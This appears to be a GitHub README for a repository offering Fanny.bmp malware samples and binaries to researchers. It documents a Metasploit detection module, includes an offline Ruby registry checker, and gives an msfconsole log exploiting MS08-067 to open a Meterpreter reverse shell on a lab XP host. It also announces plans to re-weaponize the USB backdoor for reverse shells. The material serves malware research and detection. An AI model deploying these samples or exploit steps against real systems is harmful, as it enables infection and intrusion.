FANNY BMP MALWARE SOURCE + BINARY + Metasploit Module Checker

launchcodeis127/fanny.bmp

FannyBMP or DementiaWheel


MAJOR update coming soon:

When I am done with the OSCP I am currently enrolled in, I will create and upload the following:

  • A recording (from scratch, 0% to 100%) of Fanny.bmp "infecting" a PLC. (It does not actually do anything to, or infect, a PLC; it detects PLCs in a way somewhat similar to how Stuxnet did. The PLC will be a virtual one, since I have no real access to a nuclear reactor, for quite obvious reasons.)
  • A recording (again, 0% to 100%) of how one can re-weaponize Fanny.bmp's USB backdoor (DementiaWheel, as its codename suggests) to carry commands to and from Metasploit. (This is tested and, let's just say, it works, but it needs improvement. Massive improvements, that is.) <- Still working on it.
  • A mini-library written in C (in combination with Lua) to make the two points above a bit more user-friendly, so you don't need to be a debugger professional to understand how to get a reverse shell through Fanny's USB backdoor, for example.

For the story, refer to the article(s) I have provided below; if you are interested, also read my theory on Fanny.bmp's and Stuxnet's purpose on the Issues page: "The Purpose of Fanny.bmp - in relation to StuXNet #7".

Related samples: Agent.btz and Stuxnet

Refs:

[+1] Video demonstrating a re-creation of fanny.bmp that displays a MessageBox (soon cmd)

Note: I have created a new POC video demonstrating fanny.bmp, as well as a bug that I do not think is known (at least probably not to the developers that made fanny.bmp). That the rootkit hides files carrying the prefix it is designed to hide is expected; the unexpected thing, to me anyway, was that it crashed explorer.exe (and the whole XP system) while doing so. This is done by "using" the rootkit provided in fanny.bmp.

How to re-create the crash/bug:

Name a folder, file or shortcut `__e__.lnk` (note: Explorer stops displaying the file as soon as you type the "e"), and then, hopefully, Explorer will crash with an error message, or two error messages, for that matter.

POC (Proof Of Concept) Video(s)

The renewed video is here:

https://youtu.be/Uto_lcD2f38

The video file itself is here: https://github.com/loneicewolf/fanny.bmp/blob/main/ReNewed(Fannybmp%20Winxp%20Poc)%20(With%20Rootkit%20Demo%20%2B%20Bug%20Crash)%20.mp4.7z


Screenshot of the "empty" USB stick (not yet infected by fanny; this is the stick that was experimented with and later infected by fanny.bmp), displaying the files the rootkit tried to hide, while explorer.exe crashed with 2 error messages instead:

https://github.com/loneicewolf/fanny.bmp/blob/main/SanUltra%20(Fanny.bmp%20Bug).png

The 2 error messages from fanny.bmp while its rootkit was in use and tried to hide a file/directory created by the user (called `__e__.lnk` in this example):

https://github.com/loneicewolf/fanny.bmp/blob/main/2Errors(while%20rootkit%20tried%20to%20hide%20__).png

For detection of fanny.bmp infections using Metasploit, documentation for the module is available at the wiki: https://github.com/loneicewolf/fanny.bmp/wiki/Docs


POCS

By-OS:


I thought of providing all of these earlier, since I was one of the people that got this on my USB stick (my USB got infected a long, long time ago, years ago now). But now, when I looked closer, I saw that some of these aren't even available online. Some of them are, still, like fanny.bmp and maybe some others, and ECELP4.acm, but not any of mscorwin / comhost, etc. (If they are, I would love to hear that, and the source of it. The more sources of the same malware, the better; it strengthens the "community", if I can put it that way, and it is easier to find if all material is gathered in one place.) So I thought of providing all of these to malware researchers, as well as for academic purposes.


Note: In the video I provided, I had slight problems with the USB keyboard, so I wrote "EDUCATIONAK" but meant "EDUCATIONAL". Contact me for any details.

(Q) Why would you want to upload malware? You're literally providing cyber weapons! (A) I believe in open source, and that even in this scenario it can hopefully help malware researchers provide better protection.

But the major point is actually as said above, adding the following reason:

  • to help people in the future find these malware samples, as I think there are very few (if any) easily accessible online.

To detect fanny, refer to this article:

And (for optional reading) I would suggest this one: "AiR-ViBeR: Exfiltrating Data from Air-Gapped Computers via Covert Surface Vibrations", a write-up about Stuxnet, Fanny and Agent.btz (which really resemble each other in some ways).

POC:

First, get fanny_bmp_check.rb from Metasploit. (Always get the fanny.bmp module from the official Metasploit repository, so that you have the latest version of it, which I believe is vital when we talk security. If your Metasploit install already ships post/windows/gather/forensics/fanny_bmp_check, the copy step below is unnecessary.)

Place it in your local msf modules folder, usually /root/.msf4/modules/ (important: check the following step before placing it):

  • create the folders post/windows/gather/forensics/ (nested under each other) inside that modules folder, and put fanny_bmp_check.rb there, so the full path is /root/.msf4/modules/post/windows/gather/forensics/fanny_bmp_check.rb

Start msfconsole. The checker is a post module, so it needs a Meterpreter session on the target; here one is obtained from the Windows XP SP3 machine with MS08-067, but any exploit or payload that gives you a session on the box will do:

    use exploit/windows/smb/ms08_067_netapi

Set RHOSTS (the XP target) and LHOST (your listener address), then run the exploit and the post module from the resulting session:

    msf6 exploit(windows/smb/ms08_067_netapi) > run

    [*] Started reverse TCP handler on 192.168.122.1:4444
    [*] 192.168.122.160:445 - Automatically detecting the target...
    [*] 192.168.122.160:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
    [*] 192.168.122.160:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
    [*] 192.168.122.160:445 - Attempting to trigger the vulnerability...
    [*] Sending stage (175174 bytes) to 192.168.122.160
    [*] Meterpreter session 4 opened (192.168.122.1:4444 -> 192.168.122.160:1043) at 2020-12-22 16:55:02 +0100

    meterpreter > run post/windows/gather/forensics/fanny_bmp_check

    [*] Searching registry on WORKSTATION1 for Fanny.bmp artifacts.
    [+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\Driver found in registry.
    [+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter2 found in registry.
    [+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter3 found in registry.
    [+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter8 found in registry.
    [*] WORKSTATION1: 4 result(s) found in registry.
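As the msfconsole output above shows, the module's check is a registry lookup for paths under the ECELP4 ACM key. The following is an added example, not the Metasploit module and not code from this repository: a standalone Ruby script that applies the same check offline to a .reg export taken from a suspect machine (for instance with `reg export HKLM\SYSTEM\CurrentControlSet\Control\MediaResources\acm acm.reg` on the host), which is useful when you cannot, or do not want to, throw an exploit at the box just to run a post module. The key and the four names (Driver, filter2, filter3, filter8) are taken from the module output above; the page does not say whether they exist as values or as subkeys on an infected host, so the script accepts either form. The sample export embedded in the script is constructed for the example, not taken from a real infection.

```ruby
# Added example (not the Metasploit module, not code from this repository):
# offline check for the Fanny.bmp ACM registry artifacts in a Windows .reg
# export, e.g. one produced on the suspect host with:
#   reg export HKLM\SYSTEM\CurrentControlSet\Control\MediaResources\acm acm.reg
FANNY_ACM_KEY = 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4'.freeze
# Names the Metasploit module reported under that key in the msfconsole run above.
FANNY_ACM_NAMES = %w[Driver filter2 filter3 filter8].freeze

# Parse .reg text into { key_path(downcased) => { value_name(downcased) => raw_data } }.
# Handles the UTF-16LE BOM that reg.exe writes, the trailing-backslash line
# continuation used for long hex: data, the "@" default value and [-KEY] deletions.
def parse_reg_export(raw)
  text = raw.dup.force_encoding('BINARY')
  if text.start_with?("\xFF\xFE".b)
    text = text.byteslice(2, text.bytesize - 2).force_encoding('UTF-16LE')
               .encode('UTF-8', invalid: :replace, undef: :replace)
  end
  text = text.force_encoding('UTF-8').scrub.gsub(/\\\r?\n\s*/, '')
  keys = Hash.new { |h, k| h[k] = {} }
  current = nil
  text.each_line do |line|
    line = line.strip
    next if line.empty? || line.start_with?('Windows Registry Editor', 'REGEDIT4', ';')
    if (m = line.match(/\A\[(-?)(.+)\]\z/))
      current = m[1] == '-' ? nil : m[2].downcase   # "[-KEY]" means delete, not present
      keys[current] if current                       # record the key even with no values
    elsif current && (m = line.match(/\A(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)\z/))
      name = m[2] ? '' : m[1].gsub('\\"', '"').gsub('\\\\', '\\')
      keys[current][name.downcase] = m[3]
    end
  end
  keys
end

# Return the artifact paths present, in the form the module prints them.
# The page's module output lists them as paths under ECELP4 but does not say
# whether they are values or subkeys on a live host, so both forms are accepted.
def fanny_artifacts(reg)
  base = FANNY_ACM_KEY.downcase
  FANNY_ACM_NAMES.select do |name|
    (reg.key?(base) && reg[base].key?(name.downcase)) || reg.key?("#{base}\\#{name.downcase}")
  end.map { |name| "#{FANNY_ACM_KEY}\\#{name}" }
end

# Constructed sample export (not from a real infected machine): three names as
# values of ECELP4, one as a subkey, next to a benign ACM codec entry.
SAMPLE_REG = <<~'REG'
  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4]
  "Driver"="ECELP4.acm"
  "filter2"=dword:00000001
  "filter3"=hex:01,00,\
    00,00

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter8]
  @=""

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\msacm.imaadpcm]
  "Driver"="imaadp32.acm"
REG

if __FILE__ == $PROGRAM_NAME
  data = ARGV[0] ? File.binread(ARGV[0]) : SAMPLE_REG
  hits = fanny_artifacts(parse_reg_export(data))
  puts(hits.empty? ? '[-] no Fanny.bmp ACM artifacts' : hits.map { |h| "[+] #{h} found in registry" })
  puts "[*] #{hits.size} result(s) found in registry"
end
```

Run it with the path to a .reg file as the first argument, or with no argument to run it against the embedded sample. A hit only tells you the ACM registration is there; before calling it an infection, pull the file the Driver value points to (ECELP4.acm, one of the files this repository lists) and confirm it against a known sample.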

Fanny (and the other files, completely provided)

includes:

If you spot a mistake, please let me know.


Urgent Contacts: (Malware Researchers) Discord: Ken-Kaneki#3978 Mail: william-martens@protonmail.ch
